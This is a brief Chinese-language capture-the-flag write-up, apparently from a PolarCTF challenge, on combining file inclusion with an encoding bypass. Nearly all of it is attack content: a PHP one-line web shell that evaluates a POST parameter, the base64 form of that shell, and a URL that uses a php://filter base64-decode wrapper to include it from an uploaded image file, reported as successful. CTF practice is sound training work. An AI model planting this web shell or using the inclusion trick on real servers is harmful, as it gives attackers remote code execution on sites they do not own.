你的马呢?(文件包含+编码绕过)
将<?php @eval($_POST["123"]);phpinfo();?>
编码PD9waHAgQGV2YWwoJF9QT1NUWyIxMjMiXSk7cGhwaW5mbygpOz8+
使用http://a5134550-70e5-49d6-833a-d7f5e99ffe75.www.polarctf.com:8090/index.php?file=php://filter/convert.base64-decode/resource=uploads/123.png读取,包含成功